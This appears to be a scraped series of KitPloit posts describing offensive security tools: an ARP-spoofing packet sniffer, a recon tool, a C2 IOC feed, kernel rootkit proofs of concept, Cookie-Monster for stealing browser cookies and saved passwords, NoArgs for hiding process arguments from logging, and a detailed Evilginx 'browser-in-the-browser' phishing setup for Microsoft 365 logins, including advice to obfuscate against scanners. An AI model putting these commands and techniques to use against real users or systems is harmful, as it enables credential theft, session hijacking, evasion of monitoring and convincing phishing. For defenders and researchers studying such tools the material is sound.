    • 10.0.5.12 dvwa-modsecurity.lab
    • 10.0.5.13 wackopicko.lab

    License

    This Docker Compose application is released under the MIT License. See the LICENSE file for details.



    KitPloit - PenTest Tools!

    Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

    By: Zion3R β€” April 25th 2024 at 12:30

    Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.


    Installation

    1: git clone https://www.github.com/josh0xA/Espionage.git
    2: cd Espionage
    3: sudo python3 -m pip install -r requirments.txt
    4: sudo python3 espionage.py --help

    Usage

    1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
      Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
    2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
      Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
    3. sudo python3 espionage.py --normal --iface wlan0
      Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
    4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
      Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
    5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
      Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
    6. sudo python3 espionage.py --iface wlan0 --onlyhttp
      Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
    7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
      Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
    8. sudo python3 espionage.py --iface wlan0 --urlonly
      Command 8 will only sniff and return URLs visited by the victim (works best with sslstrip).

    9. Press Ctrl+C in order to stop the packet interception and write the output to file.
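The per-packet direction, protocol, and flag details such a sniffer prints all come from decoding raw headers. A minimal sketch of the IPv4 header parsing step (this is an illustration of the technique, not Espionage's actual code):

```python
import struct

def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the fixed 20-byte IPv4 header at the start of a raw packet."""
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, checksum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", packet[:20])
    return {
        "version": ver_ihl >> 4,
        "ihl": ver_ihl & 0x0F,           # header length in 32-bit words
        "total_length": total_len,
        "ttl": ttl,
        "protocol": proto,               # 6 = TCP, 17 = UDP, 1 = ICMP
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
    }

# A hand-built header: version 4, IHL 5, TTL 64, protocol TCP, 10.0.0.1 -> 10.0.0.2
hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0, 64, 6, 0,
                  bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
info = parse_ipv4_header(hdr)
assert info["src"] == "10.0.0.1" and info["protocol"] == 6
```

Capturing live packets to feed this parser requires a raw socket and root privileges, which is why every Espionage command above is run with sudo.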

    Menu

    usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
    [-t TARGET]

    optional arguments:
    -h, --help show this help message and exit
    --version returns the packet sniffers version.
    -n, --normal executes a cleaner interception, less sophisticated.
    -v, --verbose (recommended) executes a more in-depth packet interception/sniff.
    -url, --urlonly only sniffs visited urls using http/https.
    -o, --onlyhttp sniffs only tcp/http data, returns urls visited.
    -ohs, --onlyhttpsecure
    sniffs only https data, (port 443).
    -hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

    (Recommended) arguments for data output (.pcap):
    -f FILENAME, --filename FILENAME
    name of file to store the output (make extension '.pcap').

    (Required) arguments required for execution:
    -i IFACE, --iface IFACE
    specify network interface (ie. wlan0, eth0, wlan1, etc.)

    (ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
    -t TARGET, --target TARGET


    Writeup

    A simple medium writeup can be found here:
    Click Here For The Official Medium Article

    Ethical Notice

    The developer of this program, Josh Schiavone, wrote the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

    License

    MIT License
    Copyright (c) 2024 Josh Schiavone




    KitPloit - PenTest Tools!

    HackerInfo - Information Gathering For Web Application Security

    By: Zion3R β€” April 24th 2024 at 12:30




    An information-gathering tool for web application security.


    Install:

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################
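Under the hood, a filetype search like the run above boils down to a search-engine dork query scoped to the target domain. A one-line sketch of building that query (the helper name is mine for illustration, not part of HackerInfo's API):

```python
def filetype_dork(domain: str, ext: str) -> str:
    """Build a site-scoped filetype dork like the -d/-f flags imply."""
    return f"site:{domain} filetype:{ext}"

query = filetype_dork("www.facebook.com", "pdf")
print(query)  # -> site:www.facebook.com filetype:pdf
```

The tool then feeds such queries to a search library and prints each result URL, as in the output above.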

    Usage:


    Install the hackinfo library:

    sudo python setup.py install
    pip3 install hackinfo



    KitPloit - PenTest Tools!

    C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

    By: Zion3R β€” April 24th 2024 at 02:23


    A free-to-use IOC feed for various tools/malware. It started out tracking just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

    The feed should update daily. I am actively working on making the backend more reliable.


    Honorable Mentions

    Many of the Shodan queries have been sourced from other CTI researchers:

    Huge shoutout to them!

    Thanks to BertJanCyber for creating the KQL query for ingesting this feed

    And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

    What do I track?

    Running Locally

    If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY:

    echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
    python3 -m pip install -r requirements.txt
    python3 tracker.py
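Each per-tool .txt file in the feed is essentially a deduplicated IP list distilled from a Shodan query. A rough sketch of that post-processing step, using a fabricated result dict shaped like the Shodan API's search() response (a real run needs the SHODAN_API_KEY set above):

```python
# Fabricated sample shaped like shodan.Shodan(key).search(query) output.
sample_results = {
    "total": 2,
    "matches": [
        {"ip_str": "203.0.113.10", "port": 50050, "org": "ExampleHost"},
        {"ip_str": "203.0.113.10", "port": 443,   "org": "ExampleHost"},
    ],
}

def unique_ips(results: dict) -> list:
    """Deduplicate and sort the IPs from one query's matches."""
    return sorted({m["ip_str"] for m in results.get("matches", [])})

ips = unique_ips(sample_results)
assert ips == ["203.0.113.10"]  # two services, one host
```

Concatenating the per-query lists and deduplicating again would give something like the feed's all.txt.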

    Contributing

    I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted; just know that fidelity is paramount (a high true/false-positive ratio is the focus).

    References



    KitPloit - PenTest Tools!

    VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

    By: Zion3R β€” April 18th 2024 at 12:30


    PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

    NOTE

    Some modules use the ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules on older OSes, replace ExAllocatePool2 with ExAllocatePoolWithTag.


    Environment

    All modules are tested on Windows 11 x64. To test the drivers, the following options can be used on the testing machine:

    1. Enable Loading of Test Signed Drivers

    2. Setting Up Kernel-Mode Debugging

    Both options require disabling Secure Boot.

    Modules

    Detailed information is given in the README.md in each project's directory. All modules are tested on Windows 11.

    β€’ BlockImageLoad: PoCs to block driver loading with the Load Image Notify Callback method.
    β€’ BlockNewProc: PoCs to block new processes with the Process Notify Callback method.
    β€’ CreateToken: PoCs to get a fully privileged SYSTEM token with the ZwCreateToken() API.
    β€’ DropProcAccess: PoCs to drop process handle access with an Object Notify Callback.
    β€’ GetFullPrivs: PoCs to get full privileges with the DKOM method.
    β€’ GetProcHandle: PoCs to get a full-access process handle from kernelmode.
    β€’ InjectLibrary: PoCs to perform DLL injection with the Kernel APC Injection method.
    β€’ ModHide: PoCs to hide loaded kernel drivers with the DKOM method.
    β€’ ProcHide: PoCs to hide processes with the DKOM method.
    β€’ ProcProtect: PoCs to manipulate Protected Processes.
    β€’ QueryModule: PoCs to retrieve kernel driver load address information.
    β€’ StealToken: PoCs to perform token stealing from kernelmode.

    TODO

    More PoCs especially about following things will be added later:

    • Notify callback
    • Filesystem mini-filter
    • Network mini-filter

    Recommended References



    KitPloit - PenTest Tools!

    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R β€” April 17th 2024 at 12:30


    Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-monster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if a chrome PID with a handle to Cookies is known, specify the pid to duplicate its handle and file
    --chromeLoginDataPID, if a chrome PID with a handle to Login Data is known, specify the pid to duplicate its handle and file
    --edgeCookiePID, if an edge PID with a handle to Cookies is known, specify the pid to duplicate its handle and file
    --edgeLoginDataPID, if an edge PID with a handle to Login Data is known, specify the pid to duplicate its handle and file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

    Base64 encode the webkit masterkey

    python3 base64-encode.py "\xec\xfc...."

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

    Decrypt Chrome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd
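Before any decryption happens, a decrypt.py-style script simply reads rows out of the downloaded SQLite file. A sketch of that read step against a mocked table (the real Chromium Cookies schema has more columns, and decrypting the value blob requires the extracted WebKit master key, which is omitted here):

```python
import sqlite3

# A throwaway in-memory DB mimicking the columns such scripts actually read.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE cookies (host_key TEXT, path TEXT, name TEXT, "
           "encrypted_value BLOB, expires_utc INTEGER)")
db.execute("INSERT INTO cookies VALUES (?, ?, ?, ?, ?)",
           (".github.com", "/", "dotcom_user", b"v10\x01\x02...", 0))

rows = db.execute(
    "SELECT host_key, name, encrypted_value FROM cookies").fetchall()
for host, name, blob in rows:
    # Real Chromium values start with a b'v10' prefix, followed by the
    # AES-GCM nonce and ciphertext keyed by the extracted master key.
    assert blob.startswith(b"v10")
    print(host, name)
```

Swapping ":memory:" for the downloaded ChromeCookie.db path is all the real script needs for this stage; everything after is key handling and AES-GCM.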

    Installation

    Ensure Mingw-w64 and make are installed on Linux prior to compiling.

    make

    to compile exe on windows

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

    • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    KitPloit - PenTest Tools!

    NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

    By: Zion3R β€” April 16th 2024 at 12:30


    NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


    Default Cmd:


    Windows Event Logs:


    Using NoArgs:


    Windows Event Logs:


    Functionality Overview

    The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

    Hooking Mechanism

    Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

    Process Environment Block (PEB) Manipulation

    The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

    Demo: Running Mimikatz and passing it the arguments:

    Process Hacker View:


    All the arguments are hidden dynamically.

    Process Monitor View:


    Technical Implementation

    1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

    2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

    3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

    4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

    5. Execution Redirection: Upon completion of the manipulations, execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that rely on getting the process details from the PEB.

    Installation and Usage:

    Option 1: Compile NoArgs DLL:

      β€’ You will need Microsoft Detours installed.

    • Compile the DLL.

    • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

    Option 2: Download the compiled executable (ready-to-go) from the releases page.

    References:

    • https://en.wikipedia.org/wiki/Microsoft_Detours
    • https://github.com/microsoft/Detours
    • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
    • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


    KitPloit - PenTest Tools!

    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R β€” April 15th 2024 at 12:30


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video



    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months and years, major websites like Microsoft implemented various little tricks called "framebusters" (or "framekillers"), which mainly attempt to break out of iframes that might be used to serve a proxied copy of the site, as in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
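    As an illustration only (this is not the repo's actual configuration; the pattern, path, and filename here are hypothetical), the substitution-based injection can be expressed with mod_substitute rules of roughly this shape, splicing injected markup just before the closing body tag of every proxied HTML response:

```apache
# Hypothetical sketch: run HTML responses through mod_substitute and
# insert an injected script in front of </body> (case-insensitive match).
AddOutputFilterByType SUBSTITUTE text/html
Substitute "s|</body>|<script src='/bitb/window.js'></script></body>|i"
```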

    Instructions



    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMware Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

    Navigate to the user's home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

    On Ubuntu, if you get a Failed to start nameserver on: :53 error, try modifying this file:

    sudo nano /etc/systemd/resolved.conf

    Edit or add the DNSStubListener line and set it to no: DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved
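    The manual edit above can also be done non-interactively (a sketch assuming the stock resolved.conf layout, where the option may be commented out):

```shell
# Force DNSStubListener=no (uncommenting the line if needed),
# then restart the stub resolver so the change takes effect.
sudo sed -i -E 's/^#?DNSStubListener=.*/DNSStubListener=no/' /etc/systemd/resolved.conf
sudo systemctl restart systemd-resolved
```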

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443
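    The same change can be made without opening an editor (a sketch that assumes the default "https_port": 443 key/value formatting in config.json):

```shell
# Rewrite the https_port value in place, preserving the key's formatting.
sed -i -E 's/("https_port":[[:space:]]*)443/\18443/' ~/.evilginx/config.json
```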

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat
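    The series of a2enmod calls above can be collapsed into one loop with the same effect (followed by the site/module toggles that don't fit the pattern):

```shell
# Enable the required Apache modules in a single loop.
for m in proxy proxy_http proxy_balancer lbmethod_byrequests env include \
         setenvif ssl cache substitute headers rewrite; do
  sudo a2enmod "$m"
done
sudo a2ensite default-ssl
sudo a2dismod access_compat
```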

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

    Check that Apache and the VM's networking work by visiting the VM's IP from a browser on the host machine.
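    A quick way to check from the host without opening a browser (VM_IP below is a placeholder; set it to your VM's address — any HTTP status line coming back means Apache is reachable):

```shell
VM_IP="192.168.64.5"   # assumption: replace with your VM's actual IP
curl -sI "http://$VM_IP/" | head -n 1
```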

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

    • home: (Optional) Homepage (at base domain)
    • primary: Landing page (background)
    • secondary: BITB Window (foreground)
    sudo mkdir /var/www/home
    sudo mkdir /var/www/primary
    sudo mkdir /var/www/secondary
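    The three mkdir calls above can be collapsed into one line with bash brace expansion:

```shell
# Same three directories in one command (requires bash, not plain sh).
sudo mkdir -p /var/www/{home,primary,secondary}
```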

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
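    To sanity-check the generated certificate, you can print its subject and validity window:

```shell
# Confirm the cert was issued for the expected domain and is not expired.
sudo openssl x509 -in /etc/ssl/localcerts/fake.com/fullchain.pem \
  -noout -subject -dates
```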

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

    Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to pick one of the two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

    To make things easier, I included both versions as separate files for this next step.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

    Click File > Open (top-left), and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
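    On Mac or Linux, the same records can also be generated and appended from a terminal instead of editing the hosts file by hand (VM_IP below is a placeholder; set it to your VM's address):

```shell
VM_IP="192.168.64.5"   # assumption: replace with your VM's actual IP
# Emit one hosts entry per (sub)domain used in the demo and append them.
for h in login.fake.com account.fake.com sso.fake.com \
         www.fake.com portal.fake.com fake.com; do
  echo "$VM_IP $h"
done | sudo tee -a /etc/hosts
```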

    Important Note:

    This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 entries with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

    Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

    Double-click it > Install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".

